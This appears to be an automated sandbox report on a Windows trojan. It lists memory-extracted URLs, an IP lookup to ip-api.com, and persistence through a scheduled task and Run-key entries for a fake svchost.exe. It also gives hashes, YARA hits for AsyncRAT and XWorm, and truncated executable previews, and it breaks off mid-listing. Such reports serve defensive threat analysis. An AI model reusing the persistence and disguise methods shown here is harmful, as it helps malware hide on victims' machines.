                                                  https://github.com/Pester/Pesterpowershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://curl.haxx.se/docs/http-cookies.htmlRatty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp, Ratty_win32_directx11.exe.5.drfalse
                                                      		high
                                                      http://crl.m)IZ_powershell.exe, 0000000A.00000002.2601444974.00000239A61A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://qualityboy.rdcw.xyz/Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.2285781338.00000251DAD79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43B7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2476803020.00000251EABBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2520111925.000002399DBDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2327603396.000001A74D26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2840317416.0000023B539BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3249961564.000001C4BB09C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3354387858.000001F4DA2EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://discord.gg/sGNBaJSzYDRatty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                              		high
                                                              https://aka.ms/pscore68powershell.exe, 00000008.00000002.2285781338.00000251DAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.2285781338.00000251DAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/itfoundry/Poppins)&&&&sRatty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmpfalse
                                                                    		high
                                                                    http://crl.microspowershell.exe, 0000000A.00000002.2601444974.00000239A61DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      208.95.112.1
                                                                      		ip-api.comUnited States
                                                                      		53334TUT-ASUSfalse

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1561590
                                                                      Start date and time:2024-11-23 21:06:10 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 32s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:25
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Sample name:dLRcE11Dkl.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@34/38@1/1
                                                                      EGA Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 99%
                                                                      • Number of executed functions: 79
                                                                      • Number of non-executed functions: 9
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target All function.cmd, PID 5032 because it is empty
                                                                      • Execution Graph export aborted for target All function.exe, PID 1472 because it is empty
                                                                      • Execution Graph export aborted for target dLRcE11Dkl.exe, PID 2848 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 2884 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 5144 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 5396 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 5676 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 6596 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 7040 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • VT rate limit hit for: dLRcE11Dkl.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      15:07:07API Interceptor172x Sleep call for process: powershell.exe modified
                                                                      21:09:19Task SchedulerRun new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
                                                                      21:09:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                                      21:09:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Task Manager C:\Users\user\AppData\Local\Temp\Task Manager

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      208.95.112.1owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      UH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                      • ip-api.com/json/?fields=225545
                                                                      z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • ip-api.com/json/
                                                                      Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • ip-api.com/json/
                                                                      NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • ip-api.com/json/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ip-api.comowuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 208.95.112.1
                                                                      WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      UH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 208.95.112.1
                                                                      cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                      • 208.95.112.1
                                                                      z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • 208.95.112.1
                                                                      Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • 208.95.112.1
                                                                      NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • 208.95.112.1

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      TUT-ASUSowuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 208.95.112.1
                                                                      WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      UH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                                      • 208.95.112.1
                                                                      18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                      • 208.95.112.1
                                                                      cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                      • 208.95.112.1
                                                                      z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • 208.95.112.1
                                                                      Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • 208.95.112.1
                                                                      NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                      • 208.95.112.1

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe4QnTBz8fN3.exeGet hashmaliciousAsyncRAT, XWormBrowse

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\All function.cmd.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\All function.cmd
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\All function.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dLRcE11Dkl.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\dLRcE11Dkl.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:true
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................

                                                                        C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):68608
                                                                        Entropy (8bit):6.827155160364474
                                                                        Encrypted:false
                                                                        SSDEEP:1536:/0DwewicrbsN/YlRr2RF49I+g6iOwHTG+zfpIK7G4gkNxIkpv5X:/0DweDN/UrKF49I9OwR97akMkpv5X
                                                                        MD5:2B1BCFF698482A45A0D01356AD3E0384
                                                                        SHA1:77D106B1495B869600CDFDA6AFEAEC0F75A78634
                                                                        SHA-256:A9BD5014B5A6744B0A5C180A3E76FF546A514DCBAD8BF2D8C500F903A285424B
                                                                        SHA-512:E8B6A729F3B4FC02886AEED232511DC9407A52AAE40F01CD2817F8369944B14240BD3EDFD573DBDEF0D506557F02622148CE4042F6F497C20F1F11AF85EEAC77
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                        Joe Sandbox View:
                                                                        • Filename: 4QnTBz8fN3.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h^.g.....................n........... ........@.. .......................`............@....................................O........k...................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc....k.......l..................@..@.reloc.......@......................@..B........................H.......D^...[............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                        C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):14620672
                                                                        Entropy (8bit):1.5206321974035562
                                                                        Encrypted:false
                                                                        SSDEEP:49152:AYt7bnFXIUBXA6emScu5nsX0kib2IXCsi:F3XfeYX0kq2mCl
                                                                        MD5:D3565F59BBADCCEDED3D00831AF9B9E9
                                                                        SHA1:DBEC6B8026BB9C1C5500C185C7F6F69B8839450B
                                                                        SHA-256:EFEC9245E0FD8B7F0074EAA849EA0FF77DA68D01597E3DCCA3109F9C421E5D3E
                                                                        SHA-512:D5A047F9D2136886F51162ED4F2394F8A269AC99F903014B8CB6F42B86A0FD1214FC5B2F9D55CE4EF011661BB924F46B305141A1E841472F65248E0C9CD9F528
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 62%
                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........h..;..;..;..;..;.Nx;..;.N.:..;.N.:..;.N.:..;.N.:..;H..:..;...:..;M..:..;..:..;..:..;...;..;..;..;.N.:..;.Nz;..;.N.:..;Rich..;........PE..d......g.........."....&.............m.........@.............................p............`....................................................l....@.......`...............P.......I..p....................J..(...@H..@............................................text...@........................... ..`.rdata...........0..................@..@.data............h..................@....pdata.......`.......,..............@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bjsdv4i.tpz.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0l51iffg.tq0.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qmxwdfz.kse.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ztoew11.5c3.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31fndpky.03j.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3acwfl2g.ba4.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3adzek40.abk.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
